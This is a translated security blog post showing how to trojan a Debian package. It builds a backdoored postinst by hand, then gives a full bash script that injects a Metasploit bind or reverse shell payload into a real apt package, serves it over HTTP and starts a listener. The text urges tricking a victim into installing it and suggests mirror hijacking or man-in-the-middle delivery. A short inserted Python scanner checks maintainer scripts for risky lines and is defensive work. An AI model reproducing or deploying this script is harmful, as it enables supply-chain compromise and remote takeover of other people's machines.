deb package trojan using Metasploit payload


DEB is the file extension of the Debian software package format. Like the name Debian itself, DEB is named after Debra Murdock, the wife of Debian founder Ian Murdock. A Debian package is a standard Unix ar archive that bundles the package files, the package metadata and the package layout, packed with tar and gzip.

The typical program for handling these packages is dpkg, usually driven by Debian's apt-get.

Let's first install a package: axel

```
root@Dis9Team:~# apt-get install axel
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  axel
0 upgraded, 1 newly installed, 0 to remove and 305 not upgraded.
Need to get 51.5 kB of archives.
After this operation, 221 kB of additional disk space will be used.
Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
Fetched 51.5 kB in 3s (14.5 kB/s)
Selecting previously deselected package axel.
(Reading database ... 161355 files and directories currently installed.)
Unpacking axel (from .../archives/axel_2.4-1_i386.deb) ...
Processing triggers for man-db ...
Setting up axel (2.4-1) ...
root@Dis9Team:~#
```

The package is fetched over HTTP from the mirror listed in your sources, installed locally, and the downloaded .deb file is kept in a local cache directory:

```
root@Dis9Team:~# ls /var/cache/apt/archives/axel*
/var/cache/apt/archives/axel_2.4-1_i386.deb
root@Dis9Team:~#
```

Inserting a backdoor: we can bundle a backdoor into the package and forge its metadata.

```
root@Dis9Team:/tmp# dpkg -x /var/cache/apt/archives/axel_2.4-1_i386.deb /tmp/axel
root@Dis9Team:/tmp# cd axel/
root@Dis9Team:/tmp/axel# ls
etc  usr
root@Dis9Team:/tmp/axel# 
root@Dis9Team:/tmp/axel# mkdir DEBIAN
root@Dis9Team:/tmp/axel# cd DEBIAN/
root@Dis9Team:/tmp/axel/DEBIAN# vi control
root@Dis9Team:/tmp/axel/DEBIAN# cat control 
Package: axel
Version: 0.1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: Download tools
root@Dis9Team:/tmp/axel/DEBIAN#
```

Write our backdoor:

```
root@Dis9Team:/tmp/axel/DEBIAN# cat postinst 
#!/bin/sh
sudo cat /etc/passwd > /tmp/1
root@Dis9Team:/tmp/axel/DEBIAN#
```

Build the DEB package:

```
root@Dis9Team:/tmp/axel/DEBIAN# chmod 775 postinst 
root@Dis9Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axel
dpkg-deb: building package `axel' in `/tmp/axel.deb'.
root@Dis9Team:/tmp/axel/DEBIAN# file axel.deb 
axel.deb: Debian binary package (format 2.0)
```

Then send it to Helen; once Helen runs it, I can control her computer.

Let's run it and see:

```
root@Dis9Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb 
(Reading database ... 161419 files and directories currently installed.)
Preparing to replace axel 0.1 (using /tmp/axel.deb) ...
Unpacking replacement axel ...
Setting up axel (0.1) ...
sudo: unable to resolve host Dis9Team
Processing triggers for man-db ...
```

It ran successfully. The command we included was `sudo cat /etc/passwd > /tmp/1`; let's look at that file:

```
root@Dis9Team:/tmp/axel/DEBIAN# cat /tmp/1 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:112:121::/home/saned:/bin/false
brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
root@Dis9Team:/tmp/axel/DEBIAN#
```

This shows the command was executed successfully.
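A defender-side check for exactly this kind of package, added here as an example and not part of the original post: it parses the outer ar container described at the top of the page, pulls every maintainer script (preinst/postinst/prerm/postrm) out of control.tar.*, and flags lines such as the `sudo` one in the postinst above before the package is ever handed to dpkg. The sample .deb is constructed inline to mirror the hand-built one, and the RISKY patterns are an assumed starting heuristic, not an exhaustive list.

```python
import io
import tarfile

MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Assumed heuristics for a first look at a maintainer script, not an exhaustive list.
RISKY = ("sudo ", "chmod 2755", "chmod u+s", "/tmp/", " &", "curl ", "wget ")

def ar_members(blob):
    """Parse the outer 'ar' container of a .deb into {member name: bytes}."""
    assert blob[:8] == b"!<arch>\n", "not an ar archive"
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]  # name[16] mtime[12] uid[6] gid[6] mode[8] size[10] magic[2]
        name = hdr[:16].decode().rstrip().rstrip("/")  # GNU ar appends '/' to names
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)                  # members are padded to even offsets
    return members

def maintainer_scripts(deb_bytes):
    """Return {script name: text} for the maintainer scripts found in control.tar.*"""
    members = ar_members(deb_bytes)
    ctrl = next(n for n in members if n.startswith("control.tar"))
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tf:
        for m in tf.getmembers():
            base = m.name.split("/")[-1]
            if m.isfile() and base in MAINT_SCRIPTS:
                scripts[base] = tf.extractfile(m).read().decode(errors="replace")
    return scripts

def risky_lines(script_text):
    """Non-comment lines of a maintainer script that match a RISKY pattern."""
    return [ln.strip() for ln in script_text.splitlines()
            if not ln.lstrip().startswith("#") and any(p in ln for p in RISKY)]

def _ar_member(name, data):
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}".encode() + b"`\n"
    return hdr + data + (b"\n" if len(data) % 2 else b"")

def build_sample_deb(postinst):
    """Constructed sample .deb laid out like the page's hand-built one (not a real package)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in (("control", b"Package: axel\nVersion: 0.1\n"), ("postinst", postinst)):
            ti = tarfile.TarInfo("./" + name)
            ti.size = len(content)
            tf.addfile(ti, io.BytesIO(content))
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", buf.getvalue()) + _ar_member("data.tar.gz", b""))
```

Pointing `maintainer_scripts` at a real file (`open(path, "rb").read()`) gives the same review without installing anything; the same approach also covers the page's later script, whose generated postinst chains `sudo chmod 2755` and background execution.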

Automated backdoor

Can a trojan be bundled in? Yes, with an automated script:

```bash
#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.
# The author is not liable for any illegal use of this script.

scriptname=`basename "$0"`

if [[ $UID -ne 0 ]]; then
    echo "${scriptname} must be run as root"
    exit 1
fi
#
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo

# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
dpkg -x $tmpdir/$package* $workdir
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice

if [ "$choice" -eq 1 ]; then
    payload="linux/x86/shell/bind_tcp"
    echo "Enter IP:"
    read rhostIP
    echo "Enter port:"
    read bindport
    options="RHOST=$rhostIP LPORT=$bindport"
else
    if [ "$choice" -eq 2 ]; then
        payload="linux/x86/shell/reverse_tcp"
        echo "Enter IP:"
        read lhostIP
        echo "Enter port:"
        read revport
        options="LHOST=$lhostIP LPORT=$revport"
    fi
fi

echo
echo "Please enter the filename for the Metasploit payload:"
read filename
echo

cd $workdir
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"

echo "Making post-install script..."
echo

echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst

trojan2=`echo $binary$trojan | sed -e 's/^\///'`

echo "Thanks - generating your payload..."
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo

cd $workdir/DEBIAN
chmod 755 postinst
dpkg-deb --build $workdir
cd $tmpdir

echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
rm -rf $tmpdir

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

webserver="python -m SimpleHTTPServer 80"

echo "Would you like a Python webserver ? (y/n) :"
read svr
echo

if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
    cd $webroot
    $webserver &
    echo
else
    echo "Fair nuff, setup your own webserver :)"
    echo
fi

sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
    echo
    $msfdir/msfcli exploit/multi/handler payload=$payload $options E
else
    echo "Fair nuff, setup your own handler :)"
    echo
fi
```

Save it and run:

```
root@Dis9Team:/tmp# ./deb_door.sh 

#####################################################################
Script to generate a Debian package trojan using a Metasploit payload
#####################################################################

Please enter the name of the APT package you wish to trojan:
Use apt-cache search <package> for ideas :)

axel
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages will be upgraded:
  axel
1 upgraded, 0 newly installed, 0 to remove and 305 not upgraded.
Need to get 51.5 kB of archives.
After this operation, 221 kB of additional disk space will be used.
Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
Fetched 51.5 kB in 3s (15.2 kB/s)
Download complete and in download only mode

mkdir: cannot create directory `/tmp/evildeb': File exists
mkdir: cannot create directory `/tmp/evildeb/work': File exists
mkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists

Please choose your Metasploit payload
-------------------------------------

1. bind tcp
2. reverse tcp

press number and hit return:
1
Enter IP:
5.5.5.2
Enter port:
4444

Please enter the filename for the Metasploit payload:

Making post-install script...

Thanks - generating your payload...

Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/bind_tcp
 Length: 63
Options: {"RHOST"=>"5.5.5.2", "LPORT"=>"4444"}

dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line 22 package 'axel':
 value for `status' field not allowed in this context

Please enter your webroot directory:

mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory

Trojan'd axel.deb created and placed in 

Would you like a Python webserver ? (y/n) :
n

Fair nuff, setup your own webserver :)

Would you like me to setup a metasploit handler ? (y/n) :

n
```

The trojan is saved at /tmp/evildeb/work.deb

```
root@Dis9Team:/tmp# cd evildeb/
root@Dis9Team:/tmp/evildeb# tree
.
├── axel_2.4-1_i386.deb
└── work
    ├── DEBIAN
    │   └── control
    ├── etc
    │   └── axelrc
    └── usr
        ├── bin
        │   └── axel
        └── share
            ├── doc
            │   └── axel
            │       ├── API.gz
            │       ├── changelog.Debian.gz
            │       ├── changelog.gz
            │       ├── copyright
            │       ├── CREDITS
            │       ├── examples
            │       │   └── axelrc.example
            │       ├── README
            │       └── README.source
            ├── locale
            │   ├── de
            │   │   └── LC_MESSAGES
            │   │       └── axel.mo
            │   ├── nl
            │   │   └── LC_MESSAGES
            │   │       └── axel.mo
            │   ├── ru
            │   │   └── LC_MESSAGES
            │   │       └── axel.mo
            │   └── zh_CN
            │       └── LC_MESSAGES
            │           └── axel.mo
            └── man
                ├── man1
                │   └── axel.1.gz
                └── zh_CN
                    └── man1
                        └── axel.1.gz

22 directories, 18 files
root@Dis9Team:/tmp/evildeb#
```

Look at its metadata:

```
root@Dis9Team:/tmp/evildeb# cat work/DEBIAN/control 
Package: axel
Priority: optional
Section: universe/web
Installed-Size: 216
Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>
Architecture: i386
Version: 2.4-1
Depends: libc6 (>= 2.4)
Filename: pool/universe/a/axel/axel_2.4-1_i386.deb
Size: 51456
MD5sum: e5a4e5a1741cd21919a46766e24e449b
Description: light download accelerator - console version
 Axel tries to accelerate the downloading process by using multiple
 connections for one file.  It can also use multiple mirrors for one download.
 Axel tries to be as light as possible (25-30k in binary form), so it might
 be useful as a wget clone on byte-critical systems.
Homepage: http://axel.alioth.debian.org/
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Origin: Ubuntu

root@Dis9Team:/tmp/evildeb#
```

The disguise is convincing. Install it:

```
root@Dis9Team:/tmp/evildeb# dpkg -i axel_2.4-1_i386.deb 
Selecting previously deselected package axel.
(Reading database ... 161401 files and directories currently installed.)
Unpacking axel (from axel_2.4-1_i386.deb) ...
Setting up axel (2.4-1) ...
Processing triggers for man-db ...
root@Dis9Team:/tmp/evildeb#
```

Check local ports:

```
root@Dis9Team:/var/www# netstat -antp | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2975/axel
axel   
root@Dis9Team:/var/www# 
```

dis9 team: Admittedly this looks of limited use, since everyone normally downloads packages from official sources, but one could consider hijacking an official mirror or a man-in-the-middle attack.

91ri.org: Whether it is official-mirror hijacking, a man-in-the-middle attack or social engineering, how it is used is up to you; use your head, young man. Link: http://www.dis9.com/deb-package-trojan-using-metasploit-payload.html Collected and compiled by the Information Security group of the Network Security Offense and Defense Lab (www.91ri.org).
